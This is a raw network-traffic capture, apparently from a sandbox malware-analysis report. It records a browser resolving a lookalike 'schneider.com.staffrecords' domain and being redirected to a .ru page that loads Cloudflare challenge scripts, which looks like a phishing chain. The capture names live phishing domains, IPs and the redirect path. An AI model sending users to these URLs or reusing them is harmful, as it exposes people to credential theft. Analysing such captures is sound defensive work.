                                  Nov 26, 2024 00:29:25.491323948 CET49805443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.491338968 CET4434980513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.570524931 CET4434980213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.570585966 CET4434980213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.570683002 CET49802443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.570879936 CET49802443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.570879936 CET49802443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.570888042 CET4434980213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.570894957 CET4434980213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.573755980 CET49806443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.573771954 CET4434980613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.573853970 CET49806443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.574044943 CET49806443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.574050903 CET4434980613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:26.777554989 CET44349783172.217.21.36192.168.2.4
                                  Nov 26, 2024 00:29:26.777617931 CET44349783172.217.21.36192.168.2.4
                                  Nov 26, 2024 00:29:26.777745962 CET49783443192.168.2.4172.217.21.36
                                  Nov 26, 2024 00:29:27.092636108 CET4434980313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.093327045 CET49803443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.093341112 CET4434980313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.093780041 CET49803443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.093784094 CET4434980313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.216893911 CET4434980413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.217508078 CET49804443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.217536926 CET4434980413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.217905045 CET49804443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.217910051 CET4434980413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.340210915 CET4434980513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.340770006 CET49805443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.340799093 CET4434980513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.341187954 CET49805443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.341192007 CET4434980513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.424241066 CET4434980613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.424994946 CET49806443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.425026894 CET4434980613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.425417900 CET49806443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.425421953 CET4434980613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.547367096 CET4434980313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.548243999 CET4434980313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.548340082 CET49803443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.548373938 CET49803443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.548393011 CET4434980313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.548403978 CET49803443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.548408985 CET4434980313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.551352024 CET49807443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.551408052 CET4434980713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.551501036 CET49807443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.551664114 CET49807443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.551675081 CET4434980713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.674973965 CET4434980413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.675101995 CET4434980413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.675250053 CET49804443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.675571918 CET49804443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.675590992 CET4434980413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.675601006 CET49804443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.675606966 CET4434980413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.678662062 CET49808443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.678694963 CET4434980813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.678788900 CET49808443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.678913116 CET49808443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.678920984 CET4434980813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.788588047 CET49783443192.168.2.4172.217.21.36
                                  Nov 26, 2024 00:29:27.788618088 CET44349783172.217.21.36192.168.2.4
                                  Nov 26, 2024 00:29:27.792165995 CET4434979913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.792762995 CET49799443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.792785883 CET4434979913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.793243885 CET49799443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.793248892 CET4434979913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.794202089 CET4434980513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.794272900 CET4434980513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.794358015 CET49805443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.794470072 CET49805443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.794487000 CET4434980513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.794508934 CET49805443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.794513941 CET4434980513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.797102928 CET49809443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.797147989 CET4434980913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.797235012 CET49809443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.797420979 CET49809443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.797435999 CET4434980913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.879297018 CET4434980613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.879368067 CET4434980613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.879419088 CET49806443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.879503012 CET49806443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.879518032 CET4434980613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.879528999 CET49806443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.879534006 CET4434980613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.882777929 CET49810443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.882807970 CET4434981013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:27.882879972 CET49810443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.883111000 CET49810443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:27.883119106 CET4434981013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:28.238850117 CET4434979913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:28.238914013 CET4434979913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:28.238971949 CET49799443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:28.239259005 CET49799443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:28.239280939 CET4434979913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:28.239293098 CET49799443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:28.239299059 CET4434979913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:28.254077911 CET49811443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:28.254112959 CET4434981113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:28.254184008 CET49811443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:28.254483938 CET49811443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:28.254492998 CET4434981113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:29.268279076 CET4434980713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:29.268780947 CET49807443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:29.268826008 CET4434980713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:29.269228935 CET49807443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:29.269234896 CET4434980713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:29.461064100 CET4434980813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:29.461649895 CET49808443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:29.461671114 CET4434980813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:29.462306976 CET49808443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:29.462311029 CET4434980813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:29.626215935 CET4434981013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:29.626665115 CET49810443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:29.626682043 CET4434981013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:29.627074957 CET49810443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:29.627079010 CET4434981013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:29.644352913 CET4434980913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:29.644692898 CET49809443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:29.644721031 CET4434980913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:29.645081043 CET49809443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:29.645091057 CET4434980913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:29.704874992 CET4434980713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:29.704958916 CET4434980713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:29.705009937 CET49807443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:29.705149889 CET49807443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:29.705168009 CET4434980713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:29.705178022 CET49807443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:29.705183029 CET4434980713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:29.708426952 CET49812443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:29.708446026 CET4434981213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:29.708498955 CET49812443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:29.708631039 CET49812443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:29.708642006 CET4434981213.107.246.63192.168.2.4
                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 26, 2024 00:28:11.043504000 CET53630821.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:11.045352936 CET53577691.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:12.890774012 CET6474353192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:12.891058922 CET5873353192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:13.902514935 CET6411353192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:13.902652025 CET5180753192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:13.950669050 CET53548131.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:13.993707895 CET53587331.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:13.995021105 CET53647431.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:14.044670105 CET53641131.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:15.207668066 CET53518071.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:15.287817001 CET5732453192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:15.287817001 CET6206753192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:15.428554058 CET53620671.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:15.428634882 CET53573241.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:15.557391882 CET5358353192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:15.557391882 CET5257853192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:16.000328064 CET53525781.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:16.000370026 CET53535831.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:19.659063101 CET6451153192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:19.659220934 CET5231053192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:19.660155058 CET5090153192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:19.660275936 CET5669753192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:19.661041975 CET5238153192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:19.661318064 CET5561053192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:19.799535990 CET53523101.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:19.800699949 CET53509011.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:19.800709963 CET53645111.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:19.801897049 CET53523811.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:19.801913977 CET53566971.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:19.802884102 CET53556101.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:21.771958113 CET5432553192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:21.772162914 CET5911753192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:21.892963886 CET5141253192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:21.893116951 CET6317253192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:21.919840097 CET53543251.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:21.922941923 CET53591171.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:22.033797979 CET53514121.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:22.035084009 CET53631721.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:23.684176922 CET6412753192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:23.684329987 CET5746253192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:23.688992023 CET5840353192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:23.689162016 CET5701853192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:23.825284004 CET53641271.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:23.827580929 CET53574621.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:23.829998970 CET53570181.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:23.830569029 CET53584031.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:29.708538055 CET138138192.168.2.4192.168.2.255
                                  Nov 26, 2024 00:28:30.738951921 CET6013753192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:30.739104986 CET4918253192.168.2.41.1.1.1
                                  Nov 26, 2024 00:28:30.880012035 CET53601371.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:30.880196095 CET53491821.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:31.137442112 CET53610721.1.1.1192.168.2.4
                                  Nov 26, 2024 00:28:50.258460999 CET53543291.1.1.1192.168.2.4
                                  Nov 26, 2024 00:29:10.961560965 CET53559651.1.1.1192.168.2.4
                                  Nov 26, 2024 00:29:13.384422064 CET53631041.1.1.1192.168.2.4
                                  TimestampSource IPDest IPChecksumCodeType
                                  Nov 26, 2024 00:28:14.045943975 CET192.168.2.41.1.1.1c227(Port unreachable)Destination Unreachable
                                  Nov 26, 2024 00:28:15.207958937 CET192.168.2.41.1.1.1c259(Port unreachable)Destination Unreachable
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Nov 26, 2024 00:28:12.890774012 CET192.168.2.41.1.1.10x356fStandard query (0)schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.ptA (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:12.891058922 CET192.168.2.41.1.1.10x59ddStandard query (0)schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt65IN (0x0001)false
                                  Nov 26, 2024 00:28:13.902514935 CET192.168.2.41.1.1.10x5d01Standard query (0)schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.ptA (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:13.902652025 CET192.168.2.41.1.1.10xcf85Standard query (0)schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt65IN (0x0001)false
                                  Nov 26, 2024 00:28:15.287817001 CET192.168.2.41.1.1.10xa5f6Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:15.287817001 CET192.168.2.41.1.1.10x6c2cStandard query (0)www.google.com65IN (0x0001)false
                                  Nov 26, 2024 00:28:15.557391882 CET192.168.2.41.1.1.10xc321Standard query (0)8a6b7.qvzjymmm.ru65IN (0x0001)false
                                  Nov 26, 2024 00:28:15.557391882 CET192.168.2.41.1.1.10xa2b6Standard query (0)8a6b7.qvzjymmm.ruA (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:19.659063101 CET192.168.2.41.1.1.10x4f5eStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:19.659220934 CET192.168.2.41.1.1.10xf4d8Standard query (0)code.jquery.com65IN (0x0001)false
                                  Nov 26, 2024 00:28:19.660155058 CET192.168.2.41.1.1.10x4f2dStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:19.660275936 CET192.168.2.41.1.1.10xa454Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                  Nov 26, 2024 00:28:19.661041975 CET192.168.2.41.1.1.10xac1aStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:19.661318064 CET192.168.2.41.1.1.10xf18fStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                  Nov 26, 2024 00:28:21.771958113 CET192.168.2.41.1.1.10xcf47Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:21.772162914 CET192.168.2.41.1.1.10x7253Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                  Nov 26, 2024 00:28:21.892963886 CET192.168.2.41.1.1.10x8b15Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:21.893116951 CET192.168.2.41.1.1.10xc338Standard query (0)code.jquery.com65IN (0x0001)false
                                  Nov 26, 2024 00:28:23.684176922 CET192.168.2.41.1.1.10xc049Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:23.684329987 CET192.168.2.41.1.1.10x3f88Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                  Nov 26, 2024 00:28:23.688992023 CET192.168.2.41.1.1.10xcf5dStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:23.689162016 CET192.168.2.41.1.1.10xcd69Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                  Nov 26, 2024 00:28:30.738951921 CET192.168.2.41.1.1.10xb8b3Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:30.739104986 CET192.168.2.41.1.1.10x6689Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Nov 26, 2024 00:28:13.995021105 CET1.1.1.1192.168.2.40x356fNo error (0)schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt94.46.180.190A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:14.044670105 CET1.1.1.1192.168.2.40x5d01No error (0)schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt94.46.180.190A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:15.428554058 CET1.1.1.1192.168.2.40x6c2cNo error (0)www.google.com65IN (0x0001)false
                                  Nov 26, 2024 00:28:15.428634882 CET1.1.1.1192.168.2.40xa5f6No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:16.000328064 CET1.1.1.1192.168.2.40xa2b6No error (0)8a6b7.qvzjymmm.ru172.67.211.54A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:16.000328064 CET1.1.1.1192.168.2.40xa2b6No error (0)8a6b7.qvzjymmm.ru104.21.53.93A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:16.000370026 CET1.1.1.1192.168.2.40xc321No error (0)8a6b7.qvzjymmm.ru65IN (0x0001)false
                                  Nov 26, 2024 00:28:19.800699949 CET1.1.1.1192.168.2.40x4f2dNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:19.800699949 CET1.1.1.1192.168.2.40x4f2dNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:19.800709963 CET1.1.1.1192.168.2.40x4f5eNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:19.800709963 CET1.1.1.1192.168.2.40x4f5eNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:19.800709963 CET1.1.1.1192.168.2.40x4f5eNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:19.800709963 CET1.1.1.1192.168.2.40x4f5eNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:19.801897049 CET1.1.1.1192.168.2.40xac1aNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:19.801897049 CET1.1.1.1192.168.2.40xac1aNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:19.801913977 CET1.1.1.1192.168.2.40xa454No error (0)challenges.cloudflare.com65IN (0x0001)false
                                  Nov 26, 2024 00:28:19.802884102 CET1.1.1.1192.168.2.40xf18fNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                  Nov 26, 2024 00:28:21.919840097 CET1.1.1.1192.168.2.40xcf47No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:21.919840097 CET1.1.1.1192.168.2.40xcf47No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:21.922941923 CET1.1.1.1192.168.2.40x7253No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                  Nov 26, 2024 00:28:22.033797979 CET1.1.1.1192.168.2.40x8b15No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:22.033797979 CET1.1.1.1192.168.2.40x8b15No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:22.033797979 CET1.1.1.1192.168.2.40x8b15No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:22.033797979 CET1.1.1.1192.168.2.40x8b15No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:23.825284004 CET1.1.1.1192.168.2.40xc049No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:23.825284004 CET1.1.1.1192.168.2.40xc049No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:23.827580929 CET1.1.1.1192.168.2.40x3f88No error (0)challenges.cloudflare.com65IN (0x0001)false
                                  Nov 26, 2024 00:28:23.829998970 CET1.1.1.1192.168.2.40xcd69No error (0)challenges.cloudflare.com65IN (0x0001)false
                                  Nov 26, 2024 00:28:23.830569029 CET1.1.1.1192.168.2.40xcf5dNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:23.830569029 CET1.1.1.1192.168.2.40xcf5dNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                  Nov 26, 2024 00:28:30.880012035 CET1.1.1.1192.168.2.40xb8b3No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                  • 8a6b7.qvzjymmm.ru
                                  • fs.microsoft.com
                                  • https:
                                    • code.jquery.com
                                    • cdnjs.cloudflare.com
                                    • challenges.cloudflare.com
                                  • slscr.update.microsoft.com
                                  • a.nel.cloudflare.com
                                  • otelrules.azureedge.net
                                  • schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.44973894.46.180.190802484C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  Nov 26, 2024 00:28:14.162770033 CET480OUTGET / HTTP/1.1
                                  Host: schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt
                                  Connection: keep-alive
                                  Upgrade-Insecure-Requests: 1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Encoding: gzip, deflate
                                  Accept-Language: en-US,en;q=0.9
                                  Nov 26, 2024 00:28:15.553704977 CET459INHTTP/1.1 301 Moved Permanently
                                  Server: nginx
                                  Date: Mon, 25 Nov 2024 23:28:11 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 0
                                  Connection: keep-alive
                                  X-Powered-By: PHP/8.1.30
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  Set-Cookie: PHPSESSID=ef2eltm65kqmjg6sm2vv5g8l5i; path=/
                                  Location: https://8a6b7.qvzjymmm.ru/O3YCEI/#B
                                  Vary: User-Agent
                                  X-Scale: YXBvY2FzQGdpdGh1Yg==
                                  Nov 26, 2024 00:29:00.567835093 CET6OUTData Raw: 00
                                  Data Ascii:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.44973794.46.180.190802484C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  Nov 26, 2024 00:28:59.161528111 CET6OUTData Raw: 00
                                  Data Ascii:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.44974123.218.208.109443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:28:17 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  Accept-Encoding: identity
                                  User-Agent: Microsoft BITS/7.8
                                  Host: fs.microsoft.com
                                  2024-11-25 23:28:18 UTC478INHTTP/1.1 200 OK
                                  Content-Type: application/octet-stream
                                  Server: Kestrel
                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                  X-Ms-ApiVersion: Distribute 1.2
                                  X-Ms-Region: prod-eus-z1
                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                  X-OSID: 2
                                  X-CID: 2
                                  X-CCC: GB
                                  Cache-Control: public, max-age=36314
                                  Date: Mon, 25 Nov 2024 23:28:17 GMT
                                  Connection: close
                                  X-CID: 2


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.449742172.67.211.544432484C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:28:18 UTC667OUTGET /O3YCEI/ HTTP/1.1
                                  Host: 8a6b7.qvzjymmm.ru
                                  Connection: keep-alive
                                  Upgrade-Insecure-Requests: 1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: navigate
                                  Sec-Fetch-User: ?1
                                  Sec-Fetch-Dest: document
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  sec-ch-ua-platform: "Windows"
                                  Accept-Encoding: gzip, deflate, br
